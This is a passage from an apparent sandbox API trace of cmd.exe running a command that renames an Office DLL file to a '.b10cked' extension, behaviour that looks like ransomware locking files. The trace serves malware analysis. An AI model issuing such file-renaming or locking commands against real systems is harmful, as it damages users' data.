Protect=0x104, Type=0x20000)) returned 0x1c [0160.855] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cf7ec, dwLength=0x1c | out: lpBuffer=0x1cf7ec*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.855] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cf7ec, dwLength=0x1c | out: lpBuffer=0x1cf7ec*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0160.855] GetConsoleOutputCP () returned 0x1b5 [0160.855] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0160.856] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0160.856] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.856] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0160.856] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.856] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0160.856] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.856] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0160.856] _get_osfhandle (_FileHandle=0) returned 0x3 [0160.856] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0160.856] _get_osfhandle (_FileHandle=0) returned 0x3 [0160.856] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0160.856] GetEnvironmentStringsW () returned 0x340210* [0160.857] FreeEnvironmentStringsW (penv=0x340210) returned 1 [0160.857] GetEnvironmentStringsW () returned 0x340210* [0160.857] FreeEnvironmentStringsW (penv=0x340210) returned 1 [0160.857] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce78c | out: phkResult=0x1ce78c*=0x40) returned 0x0 [0160.857] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce794, lpData=0x1ce798, lpcbData=0x1ce790*=0x1000 | out: lpType=0x1ce794*=0x0, lpData=0x1ce798*=0xa0, lpcbData=0x1ce790*=0x1000) returned 0x2 [0160.857] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce794, lpData=0x1ce798, lpcbData=0x1ce790*=0x1000 | out: lpType=0x1ce794*=0x4, lpData=0x1ce798*=0x1, lpcbData=0x1ce790*=0x4) returned 0x0 [0160.857] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce794, lpData=0x1ce798, lpcbData=0x1ce790*=0x1000 | out: lpType=0x1ce794*=0x0, lpData=0x1ce798*=0x1, lpcbData=0x1ce790*=0x1000) returned 0x2 [0160.857] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce794, lpData=0x1ce798, lpcbData=0x1ce790*=0x1000 | out: lpType=0x1ce794*=0x4, lpData=0x1ce798*=0x0, lpcbData=0x1ce790*=0x4) returned 0x0 [0160.857] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce794, lpData=0x1ce798, lpcbData=0x1ce790*=0x1000 | out: lpType=0x1ce794*=0x4, lpData=0x1ce798*=0x40, lpcbData=0x1ce790*=0x4) returned 0x0 [0160.857] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce794, lpData=0x1ce798, lpcbData=0x1ce790*=0x1000 | out: lpType=0x1ce794*=0x4, lpData=0x1ce798*=0x40, lpcbData=0x1ce790*=0x4) returned 0x0 [0160.857] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce794, lpData=0x1ce798, lpcbData=0x1ce790*=0x1000 | out: lpType=0x1ce794*=0x0, lpData=0x1ce798*=0x40, lpcbData=0x1ce790*=0x1000) returned 0x2 [0160.857] RegCloseKey (hKey=0x40) returned 0x0 [0160.857] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce78c | out: phkResult=0x1ce78c*=0x40) returned 0x0 [0160.857] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce794, lpData=0x1ce798, lpcbData=0x1ce790*=0x1000 | out: lpType=0x1ce794*=0x0, lpData=0x1ce798*=0x40, lpcbData=0x1ce790*=0x1000) returned 0x2 [0160.857] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce794, lpData=0x1ce798, lpcbData=0x1ce790*=0x1000 | out: lpType=0x1ce794*=0x4, lpData=0x1ce798*=0x1, lpcbData=0x1ce790*=0x4) returned 0x0 [0160.857] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce794, lpData=0x1ce798, lpcbData=0x1ce790*=0x1000 | out: lpType=0x1ce794*=0x0, lpData=0x1ce798*=0x1, lpcbData=0x1ce790*=0x1000) returned 0x2 [0160.857] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce794, lpData=0x1ce798, lpcbData=0x1ce790*=0x1000 | out: lpType=0x1ce794*=0x4, lpData=0x1ce798*=0x0, lpcbData=0x1ce790*=0x4) returned 0x0 [0160.857] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce794, lpData=0x1ce798, lpcbData=0x1ce790*=0x1000 | out: lpType=0x1ce794*=0x4, lpData=0x1ce798*=0x9, lpcbData=0x1ce790*=0x4) returned 0x0 [0160.857] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce794, lpData=0x1ce798, lpcbData=0x1ce790*=0x1000 | out: lpType=0x1ce794*=0x4, lpData=0x1ce798*=0x9, lpcbData=0x1ce790*=0x4) returned 0x0 [0160.857] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce794, lpData=0x1ce798, lpcbData=0x1ce790*=0x1000 | out: lpType=0x1ce794*=0x0, lpData=0x1ce798*=0x9, lpcbData=0x1ce790*=0x1000) returned 0x2 [0160.857] RegCloseKey (hKey=0x40) returned 0x0 [0160.857] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886382 [0160.857] srand (_Seed=0x5b886382) [0160.857] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll.b10cked\"" [0160.857] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll.b10cked\"" [0160.858] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0160.858] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x341970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0160.858] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0160.858] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0160.858] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0160.858] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0160.858] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0160.858] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0160.858] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0160.858] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0160.858] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0160.858] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0160.858] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0160.858] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0160.859] GetEnvironmentStringsW () returned 0x342360* [0160.859] FreeEnvironmentStringsW (penv=0x342360) returned 1 [0160.859] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0160.859] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0160.859] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0160.859] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0160.859] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0160.859] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0160.859] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0160.859] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0160.859] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0160.859] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0160.859] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf558 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0160.859] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf558, lpFilePart=0x1cf554 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf554*="Desktop") returned 0x18 [0160.859] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0160.859] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf2d4 | out: lpFindFileData=0x1cf2d4) returned 0x3409f0 [0160.859] FindClose (in: hFindFile=0x3409f0 | out: hFindFile=0x3409f0) returned 1 [0160.860] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf2d4 | out: lpFindFileData=0x1cf2d4) returned 0x3409f0 [0160.860] FindClose (in: hFindFile=0x3409f0 | out: hFindFile=0x3409f0) returned 1 [0160.860] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf2d4 | out: lpFindFileData=0x1cf2d4) returned 0x3409f0 [0160.860] FindClose (in: hFindFile=0x3409f0 | out: hFindFile=0x3409f0) returned 1 [0160.860] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0160.860] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0160.860] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0160.860] GetEnvironmentStringsW () returned 0x340210* [0160.860] FreeEnvironmentStringsW (penv=0x340210) returned 1 [0160.860] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0160.861] GetConsoleOutputCP () returned 0x1b5 [0160.861] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0160.861] GetUserDefaultLCID () returned 0x409 [0160.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0160.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf698, cchData=128 | out: lpLCData="0") returned 2 [0160.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf698, cchData=128 | out: lpLCData="0") returned 2 [0160.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf698, cchData=128 | out: lpLCData="1") returned 2 [0160.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0160.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0160.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0160.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0160.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0160.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0160.862] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0160.862] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0160.862] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0160.862] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0160.862] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0160.862] GetConsoleTitleW (in: lpConsoleTitle=0x330930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0160.863] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0160.863] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0160.863] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0160.863] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0160.863] _wcsicmp (_String1="move", _String2=")") returned 68 [0160.863] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0160.863] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0160.863] _wcsicmp (_String1="IF", _String2="move") returned -4 [0160.863] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0160.863] _wcsicmp (_String1="REM", _String2="move") returned 5 [0160.863] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0160.867] GetConsoleTitleW (in: lpConsoleTitle=0x1cf390, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0160.867] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0160.867] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0160.867] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0160.867] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0160.867] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0160.867] _wcsicmp (_String1="move", _String2="CD") returned 10 [0160.867] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0160.867] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0160.867] _wcsicmp (_String1="move", _String2="REN") returned -5 [0160.867] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0160.867] _wcsicmp (_String1="move", _String2="SET") returned -6 [0160.867] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0160.867] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0160.867] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0160.867] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0160.867] _wcsicmp (_String1="move", _String2="MD") returned 11 [0160.867] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0160.867] _wcsicmp (_String1="move", _String2="RD") returned -5 [0160.867] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0160.867] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0160.867] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0160.867] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0160.867] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0160.867] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0160.867] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0160.867] _wcsicmp (_String1="move", _String2="VER") returned -9 [0160.867] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0160.867] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0160.868] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0160.868] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0160.868] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0160.868] _wcsicmp (_String1="move", _String2="START") returned -6 [0160.868] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0160.868] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0160.868] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0160.869] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0160.869] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0160.869] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1cf14c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1cf144, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cf144*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0160.870] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0160.871] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0160.871] _wcsicmp (_String1="WWINTL~1.TRX", _String2=".") returned 73 [0160.871] _wcsicmp (_String1="WWINTL~1.TRX", _String2="..") returned 73 [0160.871] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\wwintl~1.trx")) returned 0x2020 [0160.871] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x341f18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0160.871] SetErrorMode (uMode=0x0) returned 0x0 [0160.871] SetErrorMode (uMode=0x1) returned 0x0 [0160.871] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x1cead4, lpFilePart=0x1ceabc | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~1.TRX", lpFilePart=0x1ceabc*="WWINTL~1.TRX") returned 0x3c [0160.871] SetErrorMode (uMode=0x0) returned 0x1 [0160.871] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0160.871] _wcsicmp (_String1="WWINTL~1.TRX", _String2=".") returned 73 [0160.871] _wcsicmp (_String1="WWINTL~1.TRX", _String2="..") returned 73 [0160.871] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\wwintl~1.trx")) returned 0x2020 [0160.871] SetErrorMode (uMode=0x0) returned 0x0 [0160.872] SetErrorMode (uMode=0x1) returned 0x0 [0160.872] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x1cef50, lpFilePart=0x1cece8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~1.TRX", lpFilePart=0x1cece8*="WWINTL~1.TRX") returned 0x3c [0160.872] SetErrorMode (uMode=0x0) returned 0x1 [0160.872] SetErrorMode (uMode=0x0) returned 0x0 [0160.872] SetErrorMode (uMode=0x1) returned 0x0 [0160.872] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1cf158, lpFilePart=0x1cece8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll.b10cked", lpFilePart=0x1cece8*="WWINTL.DLL.trx_dll.b10cked") returned 0x4a [0160.872] SetErrorMode (uMode=0x0) returned 0x1 [0160.872] SetLastError (dwErrCode=0x0) [0160.872] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\wwintl.dll.trx_dll.b10cked")) returned 0xffffffff [0160.872] GetLastError () returned 0x2 [0160.872] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x1ce664, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ce664) returned 0x342128 [0160.872] FindNextFileW (in: hFindFile=0x342128, lpFindFileData=0x1ce664 | out: lpFindFileData=0x1ce664) returned 0 [0160.873] GetLastError () returned 0x12 [0160.873] FindClose (in: hFindFile=0x342128 | out: hFindFile=0x342128) returned 1 [0160.874] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x341cb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x341cb8) returned 0x342128 [0160.874] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1ce8fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4a [0160.874] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x1ce8fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll", lpFilePart=0x0) returned 0x42 [0160.874] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\wwintl.dll.trx_dll")) returned 0x2020 [0160.874] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\wwintl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\wwintl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0160.875] FindClose (in: hFindFile=0x342128 | out: hFindFile=0x342128) returned 1 [0160.875] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1ce8b0 | out: _Buffer=" 1") returned 9 [0160.875] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.875] GetFileType (hFile=0x7) returned 0x2 [0160.876] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0160.876] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ce83c | out: lpMode=0x1ce83c) returned 1 [0160.876] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.876] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ce870 | out: lpConsoleScreenBufferInfo=0x1ce870) returned 1 [0160.877] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, 